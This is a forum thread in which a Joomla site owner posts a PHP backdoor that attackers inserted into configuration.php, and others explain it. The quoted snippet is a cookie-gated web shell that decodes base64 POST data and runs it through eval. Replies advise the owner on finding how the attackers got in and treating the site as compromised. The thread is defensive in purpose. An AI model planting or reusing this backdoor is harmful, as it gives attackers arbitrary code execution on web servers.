1.11M Members

hacked joomla

 
0
 

My site was hacked. They inserted this into livesite on configuartion.php

if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) { $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) eval($d);}
echo '<name=c></textarea>';exit;}

what does it say???

Thanks

 
0
 

are you PHP developer? You can search each function and get explanations from php manual!

 
0
 

are you PHP developer? You can search each function and get explanations from php manual!

no I'm not, that's why I asked you guys.

 
0
 

So you need to put more explanations.

 
1
 

My site was hacked. They inserted this into livesite on configuartion.php

if (!empty($_COOKIE) and $_COOKIE=='d'){if (!empty($_POST)) { $d=base64_decode(str_replace(' ','+',$_POST));if($d) eval($d);}
echo '<name=c></textarea>';exit;}

what does it say???

Thanks

This lets someone include encoded PHP code in the request, which will be executed on the server. This allows them to execute arbitrary PHP code with the permissions of your web server.

 
0
 

Thanks for the answer. And so, how exactly did they get to that configuration.php file?

 
0
 

Sounds like that is exactly what you should be asking your hosting provider.

 
0
 

Thanks for the answer. And so, how exactly did they get to that configuration.php file?

There's plenty of ways attackers can compromise your stuff. Your web app was vulnerable, your network was vulnerable, you're running outdated software, etc. If you're on shared hosting, I agree with the other poster -- talk to your host first.

The important thing is that if you don't identify how they get in and close it up, it'll just happen again. Until you can do a full code audit for other potential changes they made, you can't really trust your website and should still consider it compromised.

You
This article has been dead for over six months: Start a new discussion instead
Post:
Start New Discussion
Tags Related to this Article